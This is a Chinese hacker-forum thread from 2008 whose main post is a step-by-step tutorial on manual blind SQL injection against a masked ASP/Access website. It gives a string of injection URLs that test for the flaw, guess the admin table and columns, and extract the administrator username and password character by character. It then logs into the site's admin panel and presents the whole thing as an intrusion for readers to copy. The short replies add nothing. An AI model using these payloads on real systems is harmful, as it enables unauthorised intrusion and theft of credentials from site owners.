找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 2010|回复: 3

手工注入教程

[复制链接]

242

主题

2213

回帖

3883

牛毛

版块主管

www.nb5.cn

积分
10239
发表于 2008-8-28 16:54:04 | 显示全部楼层

Re:终极思考——破解系统密码

这帖子是哪个网站复制转过来的,全是乱码哦。。。。

1

主题

6

回帖

9

牛毛

初生牛犊

积分
9
发表于 2008-8-31 03:31:24 | 显示全部楼层 来自 福建省龙岩市

Re:Re:终极思考——破解系统密码

引用第1楼nchack007于2008-08-28 16:54发表的 Re:终极思考——破解系统密码 :
这帖子是哪个网站复制转过来的,全是乱码哦。。。。

不会啊

1

主题

12

回帖

18

牛毛

初生牛犊

积分
18
发表于 2008-8-31 13:56:28 | 显示全部楼层 来自 北京市
手工注入菜鸟是不太会关注的,他们只要快速,高效,殊不知,手动注入才是最准确的方法。

116

主题

115

回帖

305

牛毛

一级牛人

几分钟的文章,一辈子的命运!b

积分
305
 楼主| 发表于 2008-8-28 16:52:04 | 显示全部楼层 |阅读模式 来自 江苏省无锡市江阴市
学了黑客这么久,很多朋友只会用明小子扫啊扫的,注入大家都知道,可真正叫你手工注入又有多少人会呢.今天,我就拿我刚才检测的站来给大家做个手工注入的教程,希望大家能活学活用.
准备:
1.欠黑站点 www.**********.com(这个是我假设的)
2.工具:一双打字的手. 忽忽~~
OK,进入这个站点www.**********.com ,8错,挺美观的,随便点个消息看看.出现了www.**********.com/list.asp?id=511 不晓得站点的安全如何 习惯性的+个'号,问题出来了
Microsoft JET Database Engine 错误 '80***40e14'

字符串的语法错误 在查询表达式 'articleID=477'' 中。

/list.asp,行 12
马上+个and 1=1 回显正常 and 1=2 回显错误:找不到这篇文章
哈,看来是存在注入了
(and 1=1 回显正常 and 1=2 回显错误 则站点存在注入的可能很大)
先检测表名www.**********.com/list.asp?id=511 and 0<>(select count(*) from admin)
显示正常,看来表名是admin 了
OK ,继续检查字段名的www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)>0)
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(password)>0)
都显示正常 说明字段名是username password
下面检查帐号个数www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)=5)
显示错误 看来不是常用的admin了,继续猜
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)>5)
显示正确 看来个数大于5
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(username)>10)
显示错误 忽忽范围在5~10之间
猜了几个后确定是8位数
下面猜密码 www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(password)>10)
显示正常,Go on!
www.**********.com/list.asp?id=511 and 1=(select count(*) from admin where len(password)>11)
显示错误 大于10 不大于11 不用我说了吧 密码11位数
这么说帐号是8位 密码是11位
下面来猜帐号咯!(我是猜asc码,==还得用转换工具转下)
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>50
显示正常,大于50
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>150
错误 继续
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>130
错误,范围在缩小咯
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,1,1)) from Admin)>125
显示错误,继续.... 最后猜到是119 转换后得w
继续猜帐号第二位
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,2,1)) from Admin)=111
111转换后得o
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,3,1)) from Admin)=115 得s
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,4,1)) from Admin)=104 得h
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,5,1)) from Admin)=105 得i
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,6,1)) from Admin)=122 得z
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,7,1)) from Admin)=104 得h
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(username,8,1)) from Admin)=117 得u
说明帐号是:woshizhu
继续猜密码
www.**********.com/list.asp?id=511 and (select top 1 asc(mid(password,1,1)) from Admin)>100
显示错误
......
......
最后得出密码是:woshizhu123
终于把帐号和密码猜出来了,找到后台www.**********.com/admin/login.asp直接登入!

一个站点就这样被手工入侵了.看来这个站的安全可以用欠黑来形容了
不知道大家现在是不是对注入有进一步的了解了.希望大家能好好学习!多多交流!
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-15 06:45 , Processed in 0.134124 second(s), 38 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表